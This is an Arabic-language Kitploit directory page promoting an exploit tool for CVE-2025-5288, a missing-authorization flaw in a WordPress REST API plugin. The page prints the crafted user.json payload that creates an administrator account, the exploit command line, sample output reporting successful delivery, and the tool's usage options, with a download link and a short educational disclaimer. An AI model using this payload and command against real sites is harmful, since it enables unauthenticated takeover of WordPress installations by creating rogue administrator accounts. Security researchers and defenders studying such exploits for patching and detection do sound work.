Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-5288 — Wordpress REST API | مولّد واجهات برمجة تطبيقات مخصصة لمنصات متعددة والاستيراد والتصدير في WP 1.0.0 - 2.0.3 - غياب التفويض يؤدي إلى تصعيد الامتيازات بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-5288
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubnxploited/cve-2025-5288

CVE-2025-5288

Wordpress REST API | مولّد واجهات برمجة تطبيقات مخصصة لمنصات متعددة والاستيراد والتصدير في WP 1.0.0 - 2.0.3 - غياب التفويض يؤدي إلى تصعيد الامتيازات بدون مصادقة

عرض المستودع
33منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 REST API | Custom API Generator For Cross Platform And Import Export In WP 1.0.0 - 2.0.3 - غياب التخويل يؤدي إلى تصعيد امتيازات بدون مصادقة

📋 الوصف

إضافة REST API | Custom API Generator For Cross Platform And Import Export In WP لووردبريس عُرضة لثغرة تصعيد الامتيازات بسبب غياب فحص الصلاحيات في الدالة process_handler() في الإصدارات 1.0.0 to 2.0.3.
يتيح ذلك للمهاجمين غير المُصادَق عليهم إرسال ملف user.json مُصمَّم خصيصًا إلى نقطة نهاية مكشوفة وإنشاء حساب مدير (Administrator) جديد.

  • CVE: CVE-2025-5288
  • درجة CVSS: 9.8 (حرجة)
  • تاريخ النشر: 12 يونيو 2025
  • آخر تحديث: 12 يونيو 2025

⚙️ شرح السكربت

صيغة حمولة user.json:

root@kitploit:~
[
  {
    "author_data": {
      "post_author": "Nxploited",
      "post_author_email": "[email protected]",
      "post_author_role": "administrator"
    },
    "title": "Nxploited (Khaled_alenazi)",
    "content": "Nxploited (Khaled_alenazi)"
  }
]

🚀 خطوات الاستغلال:

root@kitploit:~
python3 CVE-2025-5288.py -u http://192.168.100.74:888/wordpress/ -json http://192.168.100.74:888/user.json

مثال على المخرجات:

root@kitploit:~
[+] Target appears vulnerable (version: 2.0.3) - exploiting...

[*] Fetching JSON payload from: http://192.168.100.74:888/user.json
[+] JSON content loaded successfully:

    [1] {
    "author_data": {
        "post_author": "Nxploited",
        "post_author_email": "[email protected]",
        "post_author_role": "administrator"
    },
    "title": "Nxploited (Khaled_alenazi)",
    "content": "Nxploited (Khaled_alenazi)"
}

[*] Launching exploitation...

[+] Exploit delivered successfully.

[+] Payload Sent:
[
    {
        "author_data": {
            "post_author": "Nxploited",
            "post_author_email": "[email protected]",
            "post_author_role": "administrator"
        },
        "title": "Nxploited (Khaled_alenazi)",
        "content": "Nxploited (Khaled_alenazi)"
    }
]

🧰 طريقة الاستخدام

root@kitploit:~
usage: CVE-2025-5288.py [-h] -u URL -json URL_JSON [--proxy PROXY] [--timeout TIMEOUT] [--no-verify] [--no-sleep] [--debug]

Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site (e.g., http://target/wp/)
  -json, --url_json URL_JSON
                        URL to hosted R.json payload
  --proxy PROXY         Proxy URL (e.g., http://127.0.0.1:8080)
  --timeout TIMEOUT     HTTP timeout in seconds (default: 10)
  --no-verify           Disable SSL certificate verification (NOT recommended!)
  --no-sleep            Disable sleep delays for faster execution
  --debug               Enable debug output

⚠️ إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية وبحوث الأمن المصرّح بها فقط. الوصول غير المصرّح به إلى الأنظمة دون إذن يُعد أمرًا غير قانوني.


بواسطة: Nxploited (Khaled_alenazi)

تنزيل الأداة